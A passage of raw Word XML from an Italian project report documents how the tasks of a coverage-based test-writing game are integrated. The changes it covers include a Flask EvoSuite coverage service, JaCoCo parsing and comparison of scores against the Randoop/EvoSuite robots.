          <w:p w14:paraId="5683EC48" w14:textId="189CF2B7"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Copertura</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="7C58C7CC"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5850F390" w14:textId="3DF30B7D" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:lastRenderedPageBreak/>
              <w:t>Partita</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349CC6C3" w14:textId="2635DAFA"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Insieme di azioni che permettono all’utente di iniziare a scrivere il test, e che si conclude con il confronto dei risultati con quelli del robot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D81EC72" w14:textId="7263CD20"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Game</w:t>
            </w:r>
            <w:r w:rsidR="00112F92" w:rsidRPr="00715086">
              <w:t>, Round</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001578E4" w:rsidRPr="00715086" w14:paraId="3529E255"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849AEB" w14:textId="695DC3FC" w:rsidR="001578E4" w:rsidRPr="00715086" w:rsidRDefault="001578E4" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>JaCoCo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F37FC51" w14:textId="470BD54F" w:rsidR="001578E4" w:rsidRPr="00715086" w:rsidRDefault="00D90770" w:rsidP="009953D2">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Strumento per la valutazione della copertura di una classe di test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31D78C30" w14:textId="2C02FF55" w:rsidR="001578E4" w:rsidRPr="00715086" w:rsidRDefault="00D90770" w:rsidP="009953D2">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00274D03" w:rsidRPr="00715086" w14:paraId="3AA96CF1"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4A85FB3B" w14:textId="1B252573" w:rsidR="00274D03" w:rsidRPr="00715086" w:rsidRDefault="00274D03" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Metodo di coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1103E45C" w14:textId="659E4665" w:rsidR="00274D03" w:rsidRPr="00715086" w:rsidRDefault="00274D03" w:rsidP="009953D2">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Parametro in base al quale viene settato l’URL per la richiesta HTTP di compilazione e coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D5C5804" w14:textId="680387DD" w:rsidR="00274D03" w:rsidRPr="00715086" w:rsidRDefault="00274D03" w:rsidP="009953D2">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Coverage Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CA335DB" w14:textId="77777777" w:rsidR="006A4D3E" w:rsidRPr="00715086" w:rsidRDefault="006A4D3E" w:rsidP="009953D2"/>
    <w:p w14:paraId="72547085" w14:textId="77777777" w:rsidR="006E357F" w:rsidRPr="00715086" w:rsidRDefault="006E357F" w:rsidP="009953D2"/>
    <w:p w14:paraId="02DD57DC" w14:textId="77777777" w:rsidR="006E357F" w:rsidRPr="00715086" w:rsidRDefault="006E357F" w:rsidP="009953D2"/>
    <w:p w14:paraId="418CA96F" w14:textId="19C907A7" w:rsidR="009A1F5B" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc148195731"/>
      <w:r w:rsidRPr="00715086">
        <w:t>3 Integrazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="67E4101D" w14:textId="77777777" w:rsidR="002223F1" w:rsidRPr="00715086" w:rsidRDefault="002223F1" w:rsidP="002223F1">
      <w:r w:rsidRPr="00715086">
        <w:t>In questo capitolo verranno descritte le modifiche apportate a ciascuno dei task ai fini dell’integrazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620B099F" w14:textId="24EE8302" w:rsidR="00B87D3E" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc148195732"/>
      <w:r w:rsidRPr="00715086">
        <w:t>3.1 Modifiche apportate ai Task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0EE4B32A" w14:textId="3DF73C00" w:rsidR="00EB28B4" w:rsidRPr="00715086" w:rsidRDefault="002223F1" w:rsidP="00EB28B4">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc148195733"/>
      <w:r w:rsidRPr="00715086">
        <w:t>3.1.1 Task 6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="72B7AEA8" w14:textId="3035170D" w:rsidR="00EB28B4" w:rsidRPr="00715086" w:rsidRDefault="00EB28B4">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Modifica alle variabili d’ambiente: In base al coverageMethod scelto è possibile effettuare una richiesta http al Task 7 o al task 8 per la compilazione e la coverage</w:t>
      </w:r>
      <w:r w:rsidR="00274D03" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> (JACOCO_COVERAGE_SERVER_URL o EVOSUITE_COVERAGE_SERVER_URL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04386B12" w14:textId="67682743" w:rsidR="00FD35ED" w:rsidRPr="00715086" w:rsidRDefault="00FD35ED">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Aggiunta della classe RequestDTO </w:t>
      </w:r>
      <w:r w:rsidR="00274D03" w:rsidRPr="00715086">
        <w:t>per realizzare un’interfaccia comune</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> con il task 7</w:t>
      </w:r>
      <w:r w:rsidR="00274D03" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> e EvoSuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E24C22F" w14:textId="21E4BCD5" w:rsidR="00FD35ED" w:rsidRPr="00715086" w:rsidRDefault="00FD35ED">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Aggiunta di una classe Parser che ci permette di estrarre la coverage dai file .CSV e .XML tramite due funzioni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180B9E1F" w14:textId="362FE3A1" w:rsidR="00FD35ED" w:rsidRPr="00715086" w:rsidRDefault="00FD35ED">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Modifica alla classe Partita per avere informazioni sul Robot</w:t>
      </w:r>
      <w:r w:rsidR="00274D03" w:rsidRPr="00715086">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>livello</w:t>
      </w:r>
      <w:r w:rsidR="00274D03" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> e metodo di coverage</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> scelti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD518E3" w14:textId="4BDC9CAB" w:rsidR="002D1803" w:rsidRPr="00715086" w:rsidRDefault="002D1803">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Modifica alla classe Coverage per memorizzare anche la coverage del Robot (Randoop o EvoSuite)</w:t>
      </w:r>
      <w:r w:rsidR="00274D03" w:rsidRPr="00715086">
        <w:t>, e il metodo di coverage (JaCoCo o EvoSuite) utile poi al landing per le sue elaborazioni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B681EEB" w14:textId="504B2C63" w:rsidR="001A67F1" w:rsidRPr="00715086" w:rsidRDefault="001A67F1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Modifiche alla funzione getCoverage(): invia un oggetto RequestDTO al task 7 o EvoSuite (in base a coverage method) invece che un oggetto Test.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>Nel caso in cui non ci siano errori viene prelevata la coverage del robot scelto in base alla classe under test e al livello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624FAAA" w14:textId="77777777" w:rsidR="00015B84" w:rsidRPr="00715086" w:rsidRDefault="002D1803">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Modifica al landing.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF1E0FD" w14:textId="48368E21" w:rsidR="001A67F1" w:rsidRPr="00715086" w:rsidRDefault="00015B84">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="001A67F1" w:rsidRPr="00715086">
        <w:t xml:space="preserve">ggiunta una funzione di parsing </w:t>
      </w:r>
      <w:r w:rsidR="008C581B" w:rsidRPr="00715086">
        <w:t xml:space="preserve">per i CSV </w:t>
      </w:r>
      <w:r w:rsidR="001A67F1" w:rsidRPr="00715086">
        <w:t xml:space="preserve">(parseEvoSuiteCoverage()) </w:t>
      </w:r>
      <w:r w:rsidR="008C581B" w:rsidRPr="00715086">
        <w:t>che contengono l’output di coverage utente se si è scelto EvoSuite come metodo di copertura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E56241" w14:textId="67173276" w:rsidR="008C581B" w:rsidRPr="00715086" w:rsidRDefault="008C581B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Aggiunta del calcolo delle righe coperte dall’utente all’interno della funzione parseJacocoCoverage() per il calcolo della coverage utente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1528A4" w14:textId="06579796" w:rsidR="002D1803" w:rsidRPr="00715086" w:rsidRDefault="008C581B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Aggiunto il confronto dei risultati della coverage dell’utente con quella del robot, con annessa visualizzazione di un alert che mostra il vincitore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C953E89" w14:textId="77777777" w:rsidR="00015B84" w:rsidRPr="00715086" w:rsidRDefault="008C581B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>In caso di errori di compilazione o errori nel calcolo della coverage del robot vengono mostrati degli alert di errore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4D166" w14:textId="72B172FD" w:rsidR="0071632B" w:rsidRPr="00715086" w:rsidRDefault="0071632B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Fixato il problema riguardante il mancato aggiornamento del colore delle linee di codice coperte e non coperte nella finestra che mostra la classe sotto tes</w:t>
      </w:r>
      <w:r w:rsidR="008C581B" w:rsidRPr="00715086">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00015B84" w:rsidRPr="00715086">
        <w:t>: la funzione di aggiornamento di Monaco Editor non era triggerata dal cambiamento di stato di decoration</w:t>
      </w:r>
      <w:r w:rsidR="008C581B" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> (le linee coperte e non sono mostrate solo se si è scelto JaCoCo come metodo di coverage)</w:t>
      </w:r>
      <w:r w:rsidR="00015B84" w:rsidRPr="00715086">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4811EC85" w14:textId="3A7A06D2" w:rsidR="002223F1" w:rsidRPr="00715086" w:rsidRDefault="002223F1" w:rsidP="002223F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc148195734"/>
      <w:r w:rsidRPr="00715086">
        <w:t>3.1.2 Task 7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="21DF8D1A" w14:textId="1916312D" w:rsidR="002223F1" w:rsidRPr="00715086" w:rsidRDefault="006D398E">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Modifica alla funzione </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>compileExecuteCovarageWithMaven()</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> per risolvere una deadlock che poteva generarsi nella lettura dello stream buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772DA90E" w14:textId="08D660B0" w:rsidR="002223F1" w:rsidRPr="00715086" w:rsidRDefault="002223F1" w:rsidP="002223F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc148195735"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>3.1.3 Task 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="2B6A9940" w14:textId="1B968DEF" w:rsidR="000D3605" w:rsidRPr="00715086" w:rsidRDefault="000D3605">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Dei due container previsti dal task 8 viene utilizzato solo il container per la generazione dei test. L’altro container risulta ora inutile dal momento che la sua funzionalità è stata ora inglobata nel primo container, grazie al servizio di coverage EvoSuite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A57FCA9" w14:textId="6732DF13" w:rsidR="00280358" w:rsidRPr="00715086" w:rsidRDefault="00280358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Modifica dell’organizzazione dei file, sono presenti adesso le cartelle robot e utente. La prima contiene gli script per la generazione e misurazione dei test del robot. Nella seconda invece ci sono gli script per la compilazione e misurazione della coverage dei test scritti dall’utente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4880F977" w14:textId="5F5A2937" w:rsidR="00280358" w:rsidRPr="00715086" w:rsidRDefault="00280358">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Lo script robot_misurazione_utente.sh originale è stato diviso in due parti: compilazione_test.sh che si occupa della compilazione dei test dell’utente, robot_misurazione_utente.sh che si occupa solo del calcolo della coverage dei dell’utente ritornando un file CSV.</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:br/>
        <w:t>La separazione è stata necessaria per poter ottenere l’output di compilazione da mostrare sull’editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34024122" w14:textId="332C0291" w:rsidR="00CD26D6" w:rsidRPr="00715086" w:rsidRDefault="00CD26D6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Modifica dei path in misurazione_livelli.sh, in modo tale da garantire il salvataggio dei test e delle coperture nel repository condiviso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F76C93B" w14:textId="583D1286" w:rsidR="00CD26D6" w:rsidRPr="00715086" w:rsidRDefault="00CD26D6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Dal momento che le classi sotto test salvate nel repository non possiedono un package, quest’ultimo viene aggiunto per il garantire il corretto funzionamento (il package non è invece richiesto nel task 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8ECE5E" w14:textId="4B7559E2" w:rsidR="00061638" w:rsidRPr="00715086" w:rsidRDefault="00061638">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Ottimizzato il processo di installazione del task 8 nel container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471787C" w14:textId="4CBE1097" w:rsidR="002223F1" w:rsidRPr="00715086" w:rsidRDefault="00CD26D6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Aggiunta di un DockerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638FAB4E" w14:textId="2B8EE834" w:rsidR="00015B84" w:rsidRPr="00715086" w:rsidRDefault="00015B84">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Aggiunta del servizio EvoSuite per il calcolo della coverage dell’utente</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000A603E" w:rsidRPr="00715086">
        <w:t>È</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> stato utilizzato il framework Flask per la realizzazione di questo servizio</w:t>
      </w:r>
      <w:r w:rsidR="009A4691" w:rsidRPr="00715086">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t>è progettato per ricevere richieste POST dall’utente e contenenti il codice della classe sotto test e della class</w:t>
      </w:r>
      <w:r w:rsidR="000A603E" w:rsidRPr="00715086">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> di test per effettuarne la compilazione e valutarne la coverage.</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009A4691" w:rsidRPr="00715086">
        <w:t>Esegue i seguenti passaggi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E86F005" w14:textId="11BDB920" w:rsidR="000A02CF" w:rsidRPr="00715086" w:rsidRDefault="009A4691">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t>iceve una richiesta POST all'endpoint "/compile-and-codecoverage" contenente i dati delle classi da compilare e misurare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75553697" w14:textId="0F6F5F84" w:rsidR="000A02CF" w:rsidRPr="00715086" w:rsidRDefault="009A4691">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t>segue due script Bash, "compilazione_test.sh" e "robot_misurazione_utente.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03449ABF" w14:textId="046F6938" w:rsidR="000A02CF" w:rsidRPr="00715086" w:rsidRDefault="009A4691">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t>e la compilazione è riuscita senza errori, viene estratta la copertura del codice da un file CSV ("statistics.csv").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6CB70" w14:textId="549345D2" w:rsidR="006D7877" w:rsidRPr="00715086" w:rsidRDefault="009A4691">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t xml:space="preserve">estituisce una risposta JSON che include le informazioni </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">su </w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t>eventuali errori</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> di compilazione</w:t>
      </w:r>
      <w:r w:rsidR="000A02CF" w:rsidRPr="00715086">
        <w:t>, l'output della compilazione e la copertura del codic</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>e, in accordo con l’interfaccia del task T6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7C5411" w14:textId="7EEB885A" w:rsidR="006D7877" w:rsidRPr="00715086" w:rsidRDefault="006D7877">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Aggiunta di un</w:t>
      </w:r>
      <w:r w:rsidR="00FD06D5" w:rsidRPr="00715086">
        <w:t xml:space="preserve">o script gunicorn.sh per l’avvio del server web </w:t>
      </w:r>
      <w:r w:rsidR="000D52F2" w:rsidRPr="00715086">
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00FD06D5" w:rsidRPr="00715086">
        <w:t>unicorn, esso è responsabile per eseguire l'app Flask e gestire le richieste HTTP in arrivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1292293E" w14:textId="12C66F5E" w:rsidR="002223F1" w:rsidRPr="00715086" w:rsidRDefault="002223F1" w:rsidP="002223F1">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc148195736"/>
      <w:r w:rsidRPr="00715086">
        <w:t>3.1.4 Task 9</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="78A5FAC4" w14:textId="7D644E7D" w:rsidR="002223F1" w:rsidRPr="00715086" w:rsidRDefault="00CD26D6">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Aggiunta del salvataggio dei file di copertura (in formato xml) per i livelli generati da Randoop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF52A62" w14:textId="7240DD74" w:rsidR="00CD26D6" w:rsidRPr="00715086" w:rsidRDefault="006D398E">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Sostituzione del file Batch in un file Bash (per la generazione dei test e calcolo della copertura) e dei percorsi “</w:t>
      </w:r>
      <w:r w:rsidR="00EF197B" w:rsidRPr="00715086">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>” in “</w:t>
      </w:r>
      <w:r w:rsidR="00EF197B" w:rsidRPr="00715086">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>”, ciò ci permette di eseguire il task su un container Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D9AC2D" w14:textId="1D7C7EEA" w:rsidR="003559BC" w:rsidRPr="00715086" w:rsidRDefault="00621119">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Modifica ai parametri </w:t>
      </w:r>
      <w:r w:rsidR="003559BC" w:rsidRPr="00715086">
        <w:t>max_iter e timelimit per permettere a Randoop di generare più livelli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F73E051" w14:textId="77777777" w:rsidR="003559BC" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="003559BC">
      <w:pPr>
